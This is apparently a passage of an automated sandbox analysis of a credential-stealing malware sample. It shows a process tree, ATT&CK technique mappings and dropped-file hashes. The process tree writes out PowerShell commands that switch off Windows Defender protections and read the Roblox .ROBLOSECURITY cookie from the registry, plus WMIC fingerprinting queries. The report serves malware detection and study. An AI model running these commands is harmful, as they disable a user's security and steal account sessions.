  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10179003479444976772,17396345482809401278,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4120 /prefetch:1
      4⤵
      PID:5084
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10179003479444976772,17396345482809401278,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6096 /prefetch:1
      4⤵
      PID:3508
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10179003479444976772,17396345482809401278,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3704 /prefetch:1
      4⤵
      PID:5244
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10179003479444976772,17396345482809401278,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5616 /prefetch:1
      4⤵
      PID:5252
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,10179003479444976772,17396345482809401278,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:2
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:624
- C:\Users\Admin\AppData\Local\Temp\yywmjx.exe
  "C:\Users\Admin\AppData\Local\Temp\yywmjx.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  PID:5588
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4.vbs"
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    PID:5672
  - - C:\Windows\SysWOW64\RUNDLL32.EXE
      "C:\Windows\System32\RUNDLL32.EXE" user32.dll, UpdatePerUserSystemParameters
      4⤵
      System Location Discovery: System Language Discovery
      PID:5796
- C:\Users\Admin\AppData\Local\Temp\figvgj.exe
  "C:\Users\Admin\AppData\Local\Temp\figvgj.exe"
  2⤵
  - Executes dropped EXE
  PID:5452
- C:\Users\Admin\AppData\Local\Temp\urithl.exe
  "C:\Users\Admin\AppData\Local\Temp\urithl.exe"
  2⤵
  - Executes dropped EXE
  PID:6020
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\urithl.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1684
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2136
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:540
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4276
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5668
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2868
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5740
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:5176
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:4880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 916 -ip 916
1⤵
PID:3640

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService
1⤵
PID:4648

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x458 0x2cc
1⤵
PID:1580

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1284

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1408

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4404

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3700

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3eb3833f769dd890afc295b977eab4b4

SHA1
e857649b037939602c72ad003e5d3698695f436f

SHA256
c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

SHA512
c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
c787930d470d0be053d565378051623e

SHA1
28e41641d6c01ee6eac6d8da2b1bbcdf846bbaf0

SHA256
a80de15c02d30a203b3ed152d11995318fe79a4eb99fa6de1f5600ad6623248f

SHA512
9736fc38006a0e8bf29a1c87c251afa1d47dfbadefbc16e844c15d626dc7d0aad622e3bd0925f3abe745a312914a3e9db2026439cbbd2a752589d1f3499aeb7e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
432B

MD5
c160b1b0b0d8479af95b2c3986e05ebc

SHA1
7af9f15f311eeeafd1bf92ee0cd3ededea40f6ce

SHA256
704e433fbd5f0005939b5bfd1b62d95c4e6c3f623140fd09262908e3f633880d

SHA512
2c73297121f7387f90405c73a8e4ed24df92eb2c6e76ddfb0be39ad690e4972ba78a475d00fe849bf3125bb37a5754bef456ac9063f318c65b9122b07b7e2901

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
2KB

MD5
28216398c49af2202a04a800f9610eec

SHA1
da0578262982f86d06809524550c999a916e8d35

SHA256
94eeb0035a2b79c73e02d21cd955b16c199ad322555617e18272f54740e5997d

SHA512
00ec5277c90a2316a1798d9047fec5154ffd1c469bfc0e776c4337cb440e4e00dd7342f4e74ab5d9cb1f56ce8cf902ec0bd9f63ee6e2528451a09b16aced3acf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
2KB

MD5
55e252d955242297724198886f04272a

SHA1
663ea830cb4b4b36db2bba2045c975dda8252a32

SHA256
c7e68fa1246344497d41c926f1d1adbf98f5482f414a55afe0f105071bdf9c88

SHA512
1dea1a47ae4395b1c7d0dd4ddf926d56d51ec09dbf3f3b221ebdb47fd3ab64591afa9d3d1dc3b608526cc109dc5740f82d6df9afe7e2e1887b75990fcaf16728

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
71324c2d26f4f0ae3dcb4a65d4db0516

SHA1
6801f86666fc1a84137a40f61f5cf2bcbf8fa226

SHA256
e6634283553421cab320138da4af63632dc2ba36252e5fcc20d0d0d3fb01dd7a

SHA512
a9416c7a4c3074339979e4b981507a0495ddf3bd7bc748d06dcfa73d4e445b14bcf69c4bf7a55d7ec4d5b164d5a8ee719def2935b38c81a7dfba90faca7d0471

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
5c6d07e08c1161b92d3f6f308d5f494a

SHA1
d4e1f15678c83a6c2378d272f3f0d6ada94b0660

SHA256
ad55d65bc905d2180ecb7812883dd7731710e8cb6a91175e4ca0f609b3746032

SHA512
07d039b2cb1ba12d67b5b482cffb8f3f4a572230b586b9cb1d2c879dfb1a82b39bf09d1f14c40c8b45f2829e52f7ce8cd1bc85f651efb5cc488bacf964b5cd9b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
1edf6f37c628c6895d356ff20298d788

SHA1
6dc47f8fe099869cee780fb69346f7e589d62447

SHA256
5df60d0b5b2d28ab1ae07d30de581aa6f0546fb1610b0a67410a63b1603a4b0f

SHA512
f0e37e08b92dae0c8d3e0097226921d824d251ca6c7625e7d2f802d1aac59ef8dd4168239dbde758e45f450d80ff4495e3a46e119b3c938927c996d8ef2f3bfc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\d4dbef30-c9dc-4bb2-820c-6304acf822db\index-dir\the-real-index

Filesize
2KB

MD5
936445780aea5ab63985c32108a13974

SHA1
05d464a26861cc95c0dbcf6452880ba7d3ff4d29

SHA256
1768af7df14b5ff1d8361cf749c06e64d244a78c8b9de5bcf76c023338a7837f

SHA512
1faad16fd47096feb844348a6ddab3529dc1bdc9c19b69945ec27777d663fb6e649c2e2f981af6a16f5636401c5deb1b349af91fdcbba04b89d0682a7df912c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\d4dbef30-c9dc-4bb2-820c-6304acf822db\index-dir\the-real-index~RFe5ffedb.TMP

Filesize
48B

MD5
c585b48180d161b95508698fed2415c1

SHA1
ad083f9f6021e381e686997b4d0690ada4591e69

SHA256
9867509709a077bfe6d711eb7e842edee394785bd3f40ab5e74b461b5f6002dd

SHA512
340bb7bddd3dd52dfbf3deb6f50c4415d388a06a948abe2460a14ae939159051ec6d209943e8b4ee9e167197c7f18457e307287d89bf7bebba6d931fbc68eb5f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
146B

MD5
e4fffc772c812a18392b8f0c0e6dd6ea

SHA1
1904eca120515a3f86702a18da4b496d8c51d2ff

SHA256
b0b932c576c7ab41a6c18d6b9484699bc591b1037a1b2ea641613c1db074f6a5

SHA512
f06a48062f0bfdbbcddc742f6a6b19cbd72439a55b2490021ad95ae36d10185eb32484eb8a6ae2402853779ad3c9bffafde3ba35ff1daa7048a20369897f4688

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
82B

MD5
f2cc75e51257f6e6b3a5ac850dc32fa4

SHA1
567415d718f85bc49d4386140e48778059b08c7d

SHA256
aaaee367d1b646e40b3e094e33ba92db3a55d59474ccb12903cf240620182886

SHA512
283031ea067bb5e61c2fab5798c365caa7d58b0038d73bc14f9c2da005e51a243b7820372b240b6efac8d77653228b211e977e899debca3726c36f177b314b1d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
84B

MD5
2d36df5a8cfdc5b65681ed54a6223253

SHA1
036f9a170fdb77680058a1888890cbee33a8b9e0

SHA256
a5ce481c144ab1c2c59d3b1242c71cd47fe521c6af935e811825e4f326abe446

SHA512
4e71ec6e43b98c028a6714beb3f478705e208f366e645615cacc73f35b71fdd7909335987c2e154896a4429a11b088db0b9c013153cbf57cb9510f39b256aeea

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe5faafe.TMP

Filesize
89B

MD5
e7e6f313e4f529026ec83b14f97cbd83

SHA1
747adb9f07c075784184ae9a39b18956cb7bb7e4

SHA256
fcb44d7288f5cf8306d7642c543234f7dac7b53e97bab377420e96c8c13926a1

SHA512
bf52b7f1e33a76a17b638b600690c5cfe0788586b9533ae28c00351fe075522b202112dbcae96d48a2fc882200e6358e011ecf62f31fd7cff1f0c665aee19402

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
8796042d99a738c1282694bedb84f4f1

SHA1
da34cb83f513509c445ea4a793ce145b85ae0c89

SHA256
ae81618a77e1d343db6fb70e622a6ebed709609ee42b548a0ae8cd6f568d785c

SHA512
b1859d57678e63729a795433e88b9281827a71eda66d0589e41e8ec999ea11aa987f2409edb1c1bc48d936c8cce37836b1099f519eb771e153933022c1c558cd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe5ffa57.TMP

Filesize
48B

MD5
33f4e7e3beb5d14391d03bee81dd7990

SHA1
37ea6dccb6d9be30744269ebad882b0306e0e211

SHA256
f408a12aea7c920b765b2e521d14f1f236f7bada031921cd85882215cd38527f

SHA512
a7d87d90a72d30cb1e03f4de32277b512d849ee74ddcce6b37c0b8463130e988c056b046cc88a8e5572de7b88edbff4919ce2141e96fed942543783d3b4489d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
5049177fca6323b729be6fccf4e284ef

SHA1
451486ddb0dc985f9a4a66c280d2d4ec3dd939dd

SHA256
1ed6ce36db581f4ea63d46d63e2f261721875e85bfe2abe75ea89713da3527ef

SHA512
6307f232563d45ef4405698637fe726daffcd1ac5d906d3eb3bb15d5022c25a9a2c32577510b611a67c0b4d4cebe3fbea0f659d79345bba4fcbf9fc89f97fe5f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
aff38918ab7bd050621ae0117f6e31c2

SHA1
e2db7ebf89802e317a174e69612540790cc24aaf

SHA256
7a274d4d2f88f5773ffae627b060a44485e47e51a7c8dc7ccec5815579f9da77

SHA512
2ffffcec7ba7ac5de2fe2d74347fd6b1a714c5b9bc26c649ead566b6e7c97a0ce23e65e250b7971b418ce02e71c67319964ee3fe7d0adb7394074342870c92f6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

Filesize
64KB

MD5
987a07b978cfe12e4ce45e513ef86619

SHA1
22eec9a9b2e83ad33bedc59e3205f86590b7d40c

SHA256
f1a4a978ce1c4731df1594043135cf58d084fdf129dd1c8e4507c9e06eac5ea8

SHA512
39b86540e4d35c84609ef66537b5aa02058e3d4293f902127c7d4eac8ffc65920cb5c69a77552fc085687eed66e38367f83c177046d0ecb8e6d135463cc142aa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML.bak

Filesize
9KB

MD5
7050d5ae8acfbe560fa11073fef8185d

SHA1
5bc38e77ff06785fe0aec5a345c4ccd15752560e

SHA256
cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b

SHA512
a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c67441dfa09f61bca500bb43407c56b8

SHA1
5a56cf7cbeb48c109e2128c31b681fac3959157b

SHA256
63082da456c124d0bc516d2161d1613db5f3008d903e4066d2c7b4e90b435f33

SHA512
325de8b718b3a01df05e20e028c5882240e5fd2e96c771361b776312923ff178f27494a1f5249bf6d7365a99155eb8735a51366e85597008e6a10462e63ee0e8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a3791b34fe609f9f6ba5fb09b2b1d262

SHA1
7393ccab8bf80b602a5db9c60b4bc5d022c0f74d

SHA256
2fd30685d1c33dc834e584335d3796db435c1d1260c488723e0bf7ae57bf8247

SHA512
121b1251626eeadce2e4ef101a1b70911ba6c1d9c1f04778e22f3cd126281e8eb68367fd2b43f3007c6d97575997321d70c5e475b5305b548959d5e95b838a87

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e203820eceb5320016f15fc76ba4a8be

SHA1
5b433f4b22482d62f1aa149a19ab667dc4caaa41

SHA256
1153e83e6283efc018483b91c4ef69a9eabd986fcec3e327581490d46bf90e28

SHA512
ae43abdf7845f7f27d7c4d1349d35463dcdb523cf2af88136a3e1331b0fe86b81af64e80617077c722742809797f8d126c208003dda58e9082b3573d1420837c

Download Submit
C:\Users\Admin\AppData\Local\Temp\4.vbs

Filesize
462B

MD5
593e1c1aac6eb52f5a45481a32a8a94c

SHA1
d9f9f058a22e2c1708eb46c494b705f102d65996

SHA256
477a5b41a9daa3035d3a039990fa6cbab15db95da9a6de3c42874331b642b18b

SHA512
fe8c43148cda5cad61bc4749c1384838ffde2599381da69b0b958c10d2f97351696e70124a1d38a121593e658f44b5ea25272a4bf6dd27e1a4cd1646207e0d0d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49402\VCRUNTIME140.dll

Filesize
84KB

MD5
ae96651cfbd18991d186a029cbecb30c

SHA1
18df8af1022b5cb188e3ee98ac5b4da24ac9c526

SHA256
1b372f064eacb455a0351863706e6326ca31b08e779a70de5de986b5be8069a1

SHA512
42a58c17f63cf0d404896d3b4bb16b2c9270cc2192aa4c9be265ed3970dfc2a4115e1db08f35c39e403b4c918be4ed7d19d2e2e015cb06b33d26a6c6521556e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49402\_tkinter.pyd

Filesize
56KB

MD5
1ba2aeef31d7cb6f7400d6f583dd95ed

SHA1
545e1f1bbc24f7951e34422c95fe7105ac5e2037

SHA256
5690a411c6168b9bf64840da64b6ebede7b69d5ee9d2949465525b78f89eb8fb

SHA512
c85fddee55b55c9528a7cce43678371d4333e8f8550246547329261f737d5dc96d537686f3a7b377d4516014ab084cd5aa6ed431006a5b1e1f11bc94367fd189

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49402\base_library.zip

Filesize
770KB

MD5
e3c01c9f3baf9aae0fe7cc3042b5ec36

SHA1
1e6c2bbfa83ecf62faebb255c00ac07e653d05b9

SHA256
8e26a7f2ae5bb1db8906eaa56bb6676a08c07f61015d16a072ff9daa64c83d7c

SHA512
8777b86ce1868bf94ed0f2838b3f069b8487c017d8e62e220c54f55e0cb8a93b62666a030a51be894079d14246f3dddac2241d379378e87c355733c211bcba9a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49402\python37.dll

Filesize
3.5MB

MD5
7f0b34248c228bebc731ef155b50bbff

SHA1
67fac3b44b6982a58e9bb6cd20db88f7bc1d0c44

SHA256
5de19772b6449a69c2cac3a454d6321fb0c7affc44200ed56b9ec08c38f06578

SHA512
fdf043f1b3875454e13853ca8754ff8c09431fd8e82d3de1730376175c01f634e1ed585f703e5691b87772ecd952a72c3ecb2a5093dcbda5ce053c0e36d13d23

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49402\tcl86t.dll

Filesize
1.3MB

MD5
340e110b6536a5acb2c8ecab7aa8d7c6

SHA1
4d0086388cead2bc959ff9b4fa040198c95395a9

SHA256
a30890660bfb6bc7b091f40c11fc5ed2bd4a9f4efa8903047245369853746773

SHA512
8bf1cd96c987dd942bea8c8209d947dca7a0919df0225596b4a74f244348349e3da072c143f7c9acc32c9dace84e592a7ebc08112b36bafd901bd6993b9f2997

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49402\tcl\auto.tcl

Filesize
20KB

MD5
5e9b3e874f8fbeaadef3a004a1b291b5

SHA1
b356286005efb4a3a46a1fdd53e4fcdc406569d0

SHA256
f385515658832feb75ee4dce5bd53f7f67f2629077b7d049b86a730a49bd0840

SHA512
482c555a0da2e635fa6838a40377eef547746b2907f53d77e9ffce8063c1a24322d8faa3421fc8d12fdcaff831b517a65dafb1cea6f5ea010bdc18a441b38790

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49402\tcl\encoding\cp1252.enc

Filesize
1KB

MD5
5900f51fd8b5ff75e65594eb7dd50533

SHA1
2e21300e0bc8a847d0423671b08d3c65761ee172

SHA256
14df3ae30e81e7620be6bbb7a9e42083af1ae04d94cf1203565f8a3c0542ace0

SHA512
ea0455ff4cd5c0d4afb5e79b671565c2aede2857d534e1371f0c10c299c74cb4ad113d56025f58b8ae9e88e2862f0864a4836fed236f5730360b2223fde479dc

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49402\tcl\http1.0\pkgIndex.tcl

Filesize
735B

MD5
10ec7cd64ca949099c818646b6fae31c

SHA1
6001a58a0701dff225e2510a4aaee6489a537657

SHA256
420c4b3088c9dacd21bc348011cac61d7cb283b9bee78ae72eed764ab094651c

SHA512
34a0acb689e430ed2903d8a903d531a3d734cb37733ef13c5d243cb9f59c020a3856aad98726e10ad7f4d67619a3af1018f6c3e53a6e073e39bd31d088efd4af

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49402\tcl\init.tcl

Filesize
23KB

MD5
f3557f193c8b958ba3f503c58908538a

SHA1
6fddd595a6e20eabd72fabf65e470b45ca83f539

SHA256
09d60a9ec3c51badcec93b2adf7bd679e50094ab945968f650fad899483e29d1

SHA512
cc565247a0a7a1d870fcaf4c897cdccb7be478e1790b2d65459699e9b880b713cac5812bbadd45f3a69f2d1ebf9e3134ed4ea790a04290e06ef9f786a39ac756

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49402\tcl\opt0.4\pkgIndex.tcl

Filesize
607B

MD5
92ff1e42cfc5fecce95068fc38d995b3

SHA1
b2e71842f14d5422a9093115d52f19bcca1bf881

SHA256
eb9925a8f0fcc7c2a1113968ab0537180e10c9187b139c8371adf821c7b56718

SHA512
608d436395d055c5449a53208f3869b8793df267b8476ad31bcdd9659a222797814832720c495d938e34bf7d253ffc3f01a73cc0399c0dfb9c85d2789c7f11c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49402\tcl\package.tcl

Filesize
22KB

MD5
55e2db5dcf8d49f8cd5b7d64fea640c7

SHA1
8fdc28822b0cc08fa3569a14a8c96edca03bfbbd

SHA256
47b6af117199b1511f6103ec966a58e2fd41f0aba775c44692b2069f6ed10bad

SHA512
824c210106de7eae57a480e3f6e3a5c8fb8ac4bbf0a0a386d576d3eb2a3ac849bdfe638428184056da9e81767e2b63eff8e18068a1cf5149c9f8a018f817d3e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49402\tcl\tclIndex

Filesize
5KB

MD5
e127196e9174b429cc09c040158f6aab

SHA1
ff850f5d1bd8efc1a8cb765fe8221330f0c6c699

SHA256
abf7d9d1e86de931096c21820bfa4fd70db1f55005d2db4aa674d86200867806

SHA512
c4b98ebc65e25df41e6b9a93e16e608cf309fa0ae712578ee4974d84f7f33bcf2a6ed7626e88a343350e13da0c5c1a88e24a87fcbd44f7da5983bb3ef036a162

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49402\tcl\tm.tcl

Filesize
11KB

MD5
f9ed2096eea0f998c6701db8309f95a6

SHA1
bcdb4f7e3db3e2d78d25ed4e9231297465b45db8

SHA256
6437bd7040206d3f2db734fa482b6e79c68bcc950fba80c544c7f390ba158f9b

SHA512
e4fb8f28dc72ea913f79cedf5776788a0310608236d6607adc441e7f3036d589fd2b31c446c187ef5827fd37dcaa26d9e94d802513e3bf3300e94dd939695b30

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49402\tk86t.dll

Filesize
1.2MB

MD5
a64c183c4c2a672b8ae2496224258fa5

SHA1
4af12b49a2440b1dfa303a7144a74b4ac9fce250

SHA256
5182eb6a38550cfd5312f694bb234c148cb4c073e46562753dea43540e9f12ef

SHA512
571c134b6dcd6c19996cee1984e440395c624a78b4b3a58a643919fc575ece75f50cfd8e3b1f22b1dfe72c70343a427ae3eba5adb23ced2ecf1e00ac6af4f288

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49402\tk\button.tcl

Filesize
20KB

MD5
309ab5b70f664648774453bccbe5d3ce

SHA1
51bf685dedd21de3786fe97bc674ab85f34bd061

SHA256
0d95949cfacf0df135a851f7330acc9480b965dac7361151ac67a6c667c6276d

SHA512
d5139752bd7175747a5c912761916efb63b3c193dd133ad25d020a28883a1dea6b04310b751f5fcbe579f392a8f5f18ae556116283b3e137b4ea11a2c536ec6b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49402\tk\entry.tcl

Filesize
16KB

